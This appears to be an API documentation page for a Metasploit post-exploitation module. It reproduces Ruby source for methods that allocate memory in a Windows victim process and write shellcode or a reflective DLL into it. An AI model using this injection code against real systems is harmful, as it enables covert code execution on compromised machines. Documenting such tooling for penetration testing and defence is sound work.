Module: Msf::Post::Windows::ReflectiveDLLInjection

Includes:
ReflectiveDLLLoader
Included in:
Process
Defined in:
lib/msf/core/post/windows/reflective_dll_injection.rb

Overview

This module exposes functionality which makes it easier to do Reflective DLL Injection into processes on a victim's machine.

Constant Summary collapse

PAGE_ALIGN =
1024

Constants included from ReflectiveDLLLoader

ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER

Instance Method Summary collapse

Methods included from ReflectiveDLLLoader

#load_rdi_dll, #load_rdi_dll_from_data

Instance Method Details

#inject_dll_data_into_process(process, dll_data, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER) ⇒ Array

Inject a reflectively-injectable DLL into the given process using reflective injection.

Parameters:

Returns:

  • (Array)

    Tuple of allocated memory address and offset to the ReflectiveLoader function.


64
65
66
67
68
69
# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 64

def inject_dll_data_into_process(process, dll_data, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER)
  offset = load_rdi_dll_from_data(dll_data, loader_name: loader_name, loader_ordinal: loader_ordinal)
  dll_mem = inject_into_process(process, dll_data)

  return dll_mem, offset
end

#inject_dll_into_process(process, dll_path, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER) ⇒ Array

Inject a reflectively-injectable DLL into the given process using reflective injection.

Parameters:

Returns:

  • (Array)

    Tuple of allocated memory address and offset to the ReflectiveLoader function.


48
49
50
51
52
53
# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 48

def inject_dll_into_process(process, dll_path, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER)
  dll, offset = load_rdi_dll(dll_path, loader_name: loader_name, loader_ordinal: loader_ordinal)
  dll_mem = inject_into_process(process, dll)

  return dll_mem, offset
end

#inject_into_process(process, shellcode) ⇒ Integer

Inject the given shellcode into a target process.

Parameters:

Returns:

  • (Integer)

    Address of the shellcode in the target process's memory.


25
26
27
28
29
30
31
32
33
34
35
36
37
# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 25

def inject_into_process(process, shellcode)
  shellcode_size = shellcode.length

  unless shellcode.length % PAGE_ALIGN == 0
    shellcode_size += PAGE_ALIGN - (shellcode.length % PAGE_ALIGN)
  end

  shellcode_mem = process.memory.allocate(shellcode_size)
  process.memory.protect(shellcode_mem)
  process.memory.write(shellcode_mem, shellcode)

  return shellcode_mem
end